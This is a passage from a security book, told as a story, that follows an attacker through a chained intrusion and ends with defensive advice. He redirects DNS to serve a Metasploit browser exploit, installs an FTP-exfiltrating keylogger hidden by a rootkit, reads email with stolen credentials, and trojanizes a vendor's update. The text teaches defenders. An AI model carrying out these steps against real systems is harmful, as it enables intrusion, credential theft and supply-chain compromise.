“Okay,” Phoenix says to himself. “If I have this right, I should be able to go to my host box’s DNS configuration and point to this DNS server for DNS. Then when I enter www.google.com, I should end up at my Backtrack VM instead of the real www.google.com.” Phoenix is now starting to realize the complexity of the attack he’s trying to pull off. For a moment he second-guesses himself and wonders if he’s going too complex. But that thought lasts for only a few seconds. With that, Phoenix opens his Backtrack VM and starts up tcpdump. “I first need to see whether I can get the query to go there before I waste time building the exploit infrastructure.” With tcpdump running in his Backtrack VM, Phoenix goes to his 2003 VM and tries to browse to the Backtrack VM IP via Internet Explorer. Phoenix knows he hasn’t set up a Web server on the Backtrack VM yet, so he knows the attempts to browse it should show up in tcpdump. So, Phoenix enters the command tcpdump.

Phoenix is happy with that result. Now Phoenix goes to his host machine and sets the primary DNS to the IP address of his 2003 VM. With this set he tries to browse to www.google.com. As expected, he gets a Page Cannot Be Displayed error. Phoenix then goes back to the Backtrack tcpdump instance and sees that there’s been another attempt to connect to the Backtrack VM via HTTP, except this time, the source IP address was that of his host box. “Yeah! I have the DNS working. Now I just need to get Apache working on the Backtrack VM. I need to find out a little more about the client-side exploit that’s supposed to work against Windows Vista.” Phoenix again goes to the Web and browses to www.metasploit.org and starts to read the forums there. After an hour of reading, he has discovered that the exploit has an Apache server running, which forces a malformed HTML page to whatever browser happens to connect to the Web server. Phoenix decides he’s read enough and decides to go ahead and try setting up the exploit. He opens Metasploit in Backtrack and issues the show exploits command, which renders the following result. Figure 5.23 shows Phoenix loading Metasploit in Backtrack.

Figure 5.23 Loading Metasploit in Backtrack

Phoenix scrolls through the list of the over 300 exploits and soon finds the one he’s looking for. Phoenix copies the exploit name, types the use command, and then pastes the exploit name.

Phoenix continues and enters the other required options. He first enters the SRVPORT option, which is required to determine which port the Apache Web server will listen on—he specifies 80 there. Next he specifies the LHOST option, which is the IP address of his Backtrack VM because this is where he wants the resulting exploit to spawn the generic shell to. Next Phoenix enters the LPORT option and sets it to 7371. Last he enters the URIPATH, which is what will have to be entered into the browser of the client to get it to the right place for the exploit. For example, if Phoenix set the URIPATH to hackme, the victim would have to enter the IP address of the Backtrack VM plus that path, which would look something like http://192.168.1.10/hackme. But because Phoenix wants the exploit to load via a redirect from a DNS server, he specifies only the forward slash, which means no URI need be included. The following is what the exploit looks like with all necessary options configured:

With the options loaded, Phoenix enters the exploit command. After entering exploit, Metasploit seems to do nothing for about 15 seconds. Then the screen scrolls slightly and Phoenix sees that his exploit is loaded and waiting. Figure 5.24 shows the exploit successfully configured and loaded.

Figure 5.24 Exploit successfully configured and loaded

Now for the real test: Phoenix goes to his VM and loads a Vista VM he’s been using to test his applications on. After it starts, he simply opens Internet Explorer and browses to the IP address of the Backtrack VM. Phoenix jumps out of his seat and lets out a yelp as he sees that the exploit appears to have worked. Looking at the browser he sees the random data thrown at it, which according to the forums is what’s supposed to happen:

One other thing that really attracted Phoenix to this client-side exploit is that once the user browses to the infected page, he cannot exit Internet Explorer without manually ending the iexplore.exe process from Task Manager. In other words, that exploit locks the user in. Next Phoenix switches back to his Backtrack VM to see whether the exploit shows as successful on that side. Phoenix is delighted to see the Metasploit screen in Backtrack shows him a shell is waiting for his control:

Phoenix goes ahead and presses the Enter button. This takes him back to the exploit prompt in Metasploit. Following the instructions from the Metasploit forums, Phoenix now types the following command: Sessions -i 1 (specifying 1 as the session he wants to connect to). Phoenix has another rush of excitement as presses Enter and is immediately prompted with a shell prompt that shows him he’s connected to the target with local system privileges. Confident that his exploit will work, Phoenix is set. Now he just needs to wait for the Quizzi dude to connect and try to go to Google. Phoenix is trusting that someone on Quizzi’s home network will attempt to browse to www.google.com.

Now, with everything set, Phoenix goes ahead and connects back to the wireless access point and clicks on the WAN Configuration icon. Phoenix changes the primary DNS server to be that of his 2003 Server VM and clicks Save. He then goes to his host machine, which obviously has DHCP settings from the access point. He clears the cache on his copy of Internet Explorer and types www.google.com into the URL area. As his browser appears to hang, Phoenix knows that he’s probably got success. He goes back to his Backtrack VM to see whether it shows the connection he just tried to make to Google and to verify that the wireless access point pointed him to the right place. Suddenly Phoenix’s browser screen is filled with what appears to be random garbled text. This lets him know the exploit has been sent from Metasploit, which is running inside Backtrack.

Figure 5.25 shows Internet Explorer being exploited by the ani chunksize exploit.

Figure 5.25 Internet Explorer being conquered by the ani chunksize exploit

Phoenix goes back to his Backtrack VM and pats himself on the back as he sees a second session being opened to a different IP address—the IP address of his host machine.

Now to clear everything up and make sure he has a clean exploit waiting for the Quizzi dude whenever he finally comes home and tries to browse to Google. Phoenix enters the command to stop and reload the exploit. Phoenix enters the rexploit command.

Now it’s a waiting game. While Phoenix sits and thinks, he realizes he hasn’t decided exactly what he needs to do once he has access to a Quizzi system. Just as he’s about to answer that question for himself, his phone rings. Looking at the unknown number, he suspects it’s his “employer” calling to see how well he’s coming along. Phoenix answers the phone and before he can say hello, the man on the other end starts talking. “We’ve been keeping track of what you’ve been doing. It turns out that we were able to plant someone inside Grethrip Harmon. We still need you to finish, but the goal has changed. We know you’ve been working toward getting in via a trusted third party. What you need to do now is get a keylogger on the system in which they run the visualization program. You’ll need to have the keylogger dump its captures out to an FTP server. When you have it all set up, we’ll call you and get the credentials to get to the FTP server. You’ll find more money at your house in the kitchen pantry when you get back home. I don’t need to remind you that time is of the essence. So, hurry up.” Phoenix is about to ask some questions when the man abruptly hangs up the phone. “$%*&,” Phoenix yells. To Phoenix it seems as if the guys knew exactly where he was, what he was doing, and exactly how far he had gotten toward accomplishing the objective. Even though it sounds impossible, Phoenix somehow has an uncanny feeling that they know EXACTLY where he is and what he’s doing.

Phoenix thinks about which keylogger mechanisms behave in the way the man described. “I could code something from somebody else’s code and modify it a bit, but I don’t have time for that,” Phoenix says to himself. He searches the Web for 10 minutes and realizes this could take a while. Phoenix fires off an e-mail to one of his underground associates known as Slack, and asks whether he knows of a keylogger that dumps its captures out to an FTP site if specified. The e-mail is out of Phoenix’s outbox no more than 5 minutes before he already has a response. Slack suggests Phoenix use something called Fearless Keylogger. Without wasting any more time, Phoenix goes to the link Slack provided and gets the keylogger. As always, Phoenix starts reading the documentation. The instructions are straightforward: Configure the keylogger with your specific options, such as FTP server address, path, and so on. “This seems like a piece of cake,” Phoenix says to himself. He opens the executable for the keylogger and is presented with a simple, yet practical interface.

Phoenix clicks Logging Options and fills in the FTP information the man on the phone sent him via a text message shortly after their last call. Figure 5.26 shows Phoenix’s configuration of the logging options.

Figure 5.26 Configuring logging options in Fearless Keylogger

Next Phoenix finishes by configuring the server options. Figure 5.27 shows the server options being configured.

Figure 5.27 Configuring the server options in the keylogger

Now Phoenix clicks the Build Server button and gets a confirmation message letting him know that the keylogging server.exe program is built and configured. Figure 5.28 illustrates the program after it’s successfully built the keylogger.

Figure 5.28 Keylogger successfully built

“Back to the waiting game,” Phoenix says. An hour passes and there’s still no sign of anyone entering or exiting the apartment building across the street where the Quizzi guy lives. Phoenix immediately has another idea. He knows that he’ll need to find a way to hide his keylogger after he installs it on the Quizzi computer. He also plans to push the same keylogger via Quizzi into the Visual IQ program and eventually have it end up inside Grethrip Harmon. Rootkits come to mind. “I’ve got nothing but time,” says Phoenix, “I might as well.” Phoenix knows about two rootkits that are configurable and relatively easy to load: Hacker Defender and AFXRootkit 2005. Phoenix is familiar with both but he decides to start with AFXRootkit 2005. The premise behind it is to create any folder on a Windows PC, put the root.exe file in that folder, and then execute it using the /i switch, which renders that folder and everything in it invisible to Windows. It’s been a while since Phoenix has used either rootkit, so he begins by copying the rootkit folder, which he downloaded from a friend’s FTP server, to the desktop of his Vista VM. In the folder he sees the content shown in Figure 5.29.

Figure 5.29 AFXRootkit 2005 folder contents

As instructed in the readme.txt file, Phoenix creates a new folder named temp. He then copies the root.exe file to that folder, as shown in Figure 5.30.

Figure 5.30 AFXRootkit 2005 copied to a temp folder

He goes to Start, Run and types the full path of the folder he just created and ends the path with root.exe /i, as shown in Figure 5.31.

Figure 5.31 AFXRootkit 2005 root.exe being launched with the /i option

Almost immediately Phoenix gets a blue screen as his Vista VM goes into a reboot cycle. If Phoenix had read the entire readme.txt file, he would have seen that it clearly said the kit was for NT, XP, and 2003 only. “Well, I guess I better take a look at Hacker Defender then.”

But just as Phoenix utters those words, he notices movement on his Backtrack VM screen. Just that instant he sees he’s just gotten a shell connection, most definitely from one of the Quizzi guys:

Phoenix wastes no time. He knows that the exploit has the person on the other end kind of locked in because once the attack hits the victim’s browser, the victim loses complete control of that browser session and can break the exploit only by actually stopping the IE process. Phoenix immediately presses Enter and types the same sessions command he typed earlier in his test, except this time he selects session 3.

As soon as he sees the command line of the exploited Windows machine pop up, Phoenix immediately notices something. The command line and the Windows version displayed points to it being either XP or 2003. “Okay, so I’m up against 2003 after all,” Phoenix says to himself and immediately goes to work. He quickly does what comes naturally and creates an account for himself on the box. He types the usual net user commands to create an account and then adds it to the local admins group.

After Phoenix has his account created on the exploited box, he TFTPs to his waiting 2003 box, which he uses to host his TFTP server and store thousands of tools. Phoenix then pulls down the server.exe he created earlier, which is really the keylogger. He then launches the process by typing server.exe at the command prompt.

Now it’s time to build a rootkit. He’ll need to hide the server.exe process via a rootkit. Phoenix chooses Hacker Defender because it’s what he has the most experience with. He goes to the same 2003 VM that’s hosting his tools and the TFTP server to start building his Hacker Defender to put on the compromised host. Before he does that Phoenix realizes that the Quizzi guy is probably looking at what was supposed to be the Google home page and wondering what all those funky characters on the resulting Web page are all about. He knows that at this point this person has probably tried to kill the browser and wasn’t able to. He knows that the person’s next logical move is to go the Task Manager and kill the IE process. Phoenix puts his rootkit idea on hold because he already has an administrator account on the compromised box.

That means he can connect to it again “normally” any time he wants. So, with that, he quickly browses again to the IP address of the Quizzi wireless access point. This time he logs in and changes the primary DNS server address back to that provided by the ISP. This way, the infected Quizzi computer will now be able to get to the real Google once his cache is cleared out. “Now back to the rootkit,” Phoenix says. He now goes back to the 2003 VM that’s holding all his tools and hosting the TFTP server, which he just used to pull down the keylogger. He opens a folder on the C: drive he has appropriately named kits. Inside the folder is another folder named hxdef, his Hacker Defender folder. Phoenix opens the folder and examines the files inside. Figure 5.32 shows the contents of the folder.

Figure 5.32 Contents of the Hacker Defender rootkit folder

First Phoenix renames the server.exe file to hxdefserver.exe—doing so makes the process automatically invisible to Windows (and some antivirus software). He then copies the renamed file to the same folder, hxdef. Phoenix knows that he’ll need the process to start up automatically each time Windows starts, and having a netcat backdoor running would be great as well. With that idea in mind he creates a new file named hxdef100.ini, which is required for Hacker Defender to work. It is basically the configuration file that tells the rootkit what to do. He opens Notepad and begins typing the following:

Phoenix saves the file from Notepad as hxdef100.ini, making sure he has the file type set to All Files. Phoenix knows that he’s already copied the server.exe file and launched it, which started the keylogger. But he knows it might not start at startup, and he also knows that a savvy desktop tech would quickly spot the process. So, he copies the renamed version, which he named hxdefserver.exe, along with all the other files in the hxdef folder into the TFTP folder so that he can remotely download them from the compromised machine. Now that they’re all there Phoenix goes back to the command line of the compromised host in his Backtrack VM, creates a directory named temp on the root of C:, and starts the TFTP copying again. Finally, he starts the Hacker Defender process, hxdef100.exe, which instantly hides all of his malicious files:

Not only did Phoenix just instantly hide his keylogger and other files, he simultaneously changed the environment so that anything created on the system and beginning with the letters hxdef, including executables, files, or anything else, will automatically be hidden as well. The beauty of this kit is that anything created on the infected system that begins with hxdef will be hidden from Windows (and most antivirus programs). With everything set, Phoenix begins to search the Windows box he’s compromised. He looks for anything named quizzi.exe. It doesn’t take him long to find the executable he’s looking for. It’s stored in a subdirectory inside another directory named Quizzi. Inside Quizzi is a folder named Binaries. And that’s where Phoenix finds the file he’s been looking for. Phoenix TFTPs the file back to his exploit box:

As he’s done so many times, Phoenix quickly wraps the keylogger inside the quizzi.exe file, as shown in Figure 5.33. He configures the hxdefserver.exe file to run hidden in his wrapping options.

Figure 5.33 Phoenix wraps his keylogger inside the Quizzi program file.

The next pop-up asks Phoenix what he wants to name the combined file. He types in Quizzi.exe. The file is complete. Phoenix checks the FTP server that is the location where the keylogger (one copy of which he’s already got running on the Quizzi guy’s computer) and sees it has already started to populate with logs. He opens the first text file, and just as expected, one of the first things he sees is the user typing mail.quizzisoftware.com. Now, for the first time, Phoenix knows the name of the Quizzi guy; he reads the keylog entries, which immediately follow the browser to the Quizzi Webmail: “[email protected].”

Next Phoenix sees what could be the most important piece of all he’s captured—he sees what is most likely the e-mail password, “peewee$go!” Phoenix can hardly contain himself because he’s close. He stands up to stretch his arms. He catches movement to his left, out the windows. He looks and there is someone coming out of the building where the Quizzi guy lives. Phoenix has a good idea that this is the guy whose computer he has just hacked. His suspicion is confirmed when another person jogging by on the street calls out to the 30-something gentleman. “Hello, Jake!” Phoenix knows that’s got to be him. Without wasting more time, he quickly goes to his browser and types in the URL of the mail server he just read in his keylogger logs. It is mail.quizzisoftware.com. There he enters the credentials as he reads them from his keylogger dump. For username he enters [email protected], and for a password he enters peewee$go!. Phoenix is immediately presented with the typical Outlook Web Access interface, which shows him Jake’s e-mail folders. Phoenix quickly sorts the inbox by sender and sees several e-mails from his buddy [email protected]. The last one he reads is Bill (the Visual IQ guy) telling Jake (the Quizzi guy), that his client (probably Grethrip Harmon) is complaining that the quizzi.exe process breaks some of their Web apps. Bill says that his client sends the install from Visual IQ to more than 20 people inside the company because they all use it for Visualization of some classified project and build reports based on the data.

Phoenix reads through a few more e-mails, and finds that just last week, Jake sent an apparently updated version of quizzi.exe that would fix the Web app problem. With this new knowledge, Phoenix promptly clicks on Compose and enters the following in the To: field: [email protected]. His message is short and sweet: “Bill, here is an updated version of quizzi.exe. After looking through it, I found some other errors in the code that will break other Web apps as well, so I just went ahead and fixed them before your clients begin to complain again. Please push this update out immediately.” Phoenix attaches his keylogger-trojaned version of quizzi.exe to the e-mail in a ZIP file, and clicks Send. Outlook Web Access confirms the message was sent. Phoenix hopes that Bill over at Visual IQ simply extracts the file, merges it with his own product, and promptly tells Grethrip to download it.

Shortly after Phoenix sends the e-mail to Bill Hynes at Visual IQ, he packs up his laptop and heads home, to his real home. He logs on to the Visual IQ FTP server, which he compromised earlier, and waits to see when Visual IQ modifies the executable it sends to Grethrip. It’s not long before the created time of the file Phoenix is watching changes, which lets him know that Visual IQ has most likely embedded his keylogger into the program and instructed Grethrip to go download it.

An hour after Phoenix notices the creation date of the file change on the Visual IQ FTP site, his phone rings, and it’s the same mysterious person he’s talked to only twice throughout the job.

“You’ve done well. The person inside let us know that your keylogger got through. He’s already beginning to get lots of dumps to the FTP site, and he has access to several secure areas inside Grethrip that a new hire wouldn’t have access to. He’s also been able to get access to personal and work e-mail, bank accounts, and a lot of other classified information inside Grethrip as well. As promised you’ll have all of your money tomorrow. Leave the laptop you used in your apartment, and it’ll be picked up while you’re at work Monday. Now listen closely: Forget the address of the FTP site you configured for the keylogger. Don’t ever mention it or attempt to log on to it again. If you do you’ll be a dead man.” Click. The person hangs up in typical fashion without giving Phoenix a chance to ask any questions.

A year later, the headlines of every major newspaper center on a terrorist attack against the water supply in New York. Terrorists used some chemical biological agent to contaminate the water. What’s worse is the terrorists have released documents that show the agent was actually created by a DoD contractor, Grethrip Harmon, for the U.S. government.

A company as big as Grethrip Harmon undoubtedly has many companies it partners with. Phoenix could have taken the same route with other companies that are subcontractors of Grethrip. Also, with the very real Hacker Defender rootkit, there could have been much more damage done. For example, what if Phoenix had hidden the rootkit inside the quizzi.exe program? That wouldn’t have been pretty.

The following are the steps Phoenix took for this chained exploit:

How important is it for the world to know who your company partners with or who it subcontracts information to? Better yet, does the world even need to know this? What partner companies do you link to on your corporate Web sites? If I follow these links to these companies, what information do they freely give up about you on their Web sites? What do your security policies say about working with partner companies? Are the companies you subcontract or partner with as serious and paranoid about security as you and your company are? How many of your security policies can you turn into requirements for other companies to do business with you? It is commonplace for attacks to originate from trusted third parties. You MUST make sure your partner companies understand your security stance and respect it—particularly concerning disclosure.

The tech, Bill Hynes at Visual IQ, was willing to give up way too much information. The term security awareness comes to mind. Bill basically gave up all the goods to Phoenix and told him information that should be reserved for paying clients only. “Oh, we get our updates to clients via FTP, and we make sure they get the right version by sending them MD5 checksums via e-mail” is way too much to disclose to someone who just calls up and asks.

Quite simply there should be protection mechanisms built into the software to prevent it from being so easily viewed. In other words, one should see obscured code, instead of “plain-as-day code” that can easily be deciphered. There are so many solutions available for this, and they are not very expensive at all these days. And there are even some open source free versions as well. One word: encryption.

It seems like all papers and books written on wireless security these days always start with one piece of advice: Don’t use WEP. Although this advice has become almost become cliché, WEP is still heavily in use. Several reasons contribute to this, including hardware and software that support only WEP (for example, Windows XP without Service Pack 2 or the WPA hotfix applied). The truth of the matter is that even if using WPA, a passphrase less than 14 characters makes cracking WPA almost as trivial as cracking WEP. But it should be understood that the process of cracking WPA is not as documented as cracking WEP. Just do a Google search for “Cracking WEP video” and do the same for “Cracking WPA video” and notice the difference. The attack where Phoenix simply used the default vendor username and password to manage the wireless device configuration is more commonplace than the reader might imagine. I’ve been involved in several penetration tests where many devices, including firewalls, routers, and other critical network equipment were configured with default credentials or credentials very close to the default credentials. The bottom line is, don’t leave any equipment set to the default. Imagine if every key for every Ford Explorer on the planet were the same—anybody with a Ford Explorer key could open the doors and drive off in anybody else’s Ford Explorer. It is my belief that every wireless access point should come with a unique default admin username and password.

The key here is keeping antivirus software up to date, and if possible, running some type of host-based intrusion detection. The bigger problem here is the rootkit Phoenix installed on the Quizzi laptop he infected, which was running Windows 2003 Server. Rootkits can be impossible to detect. Hacker Defender has been around for a while, but it’s important to note that it is highly customizable. There are several tools designed just to identify rootkits. Rootkit Revealer is one popular choice. There are several other open source and commercial tools available that either do or claim to do the same thing. Just be careful that you don’t rootkit yourself by using an open source rootkit-discovering tool.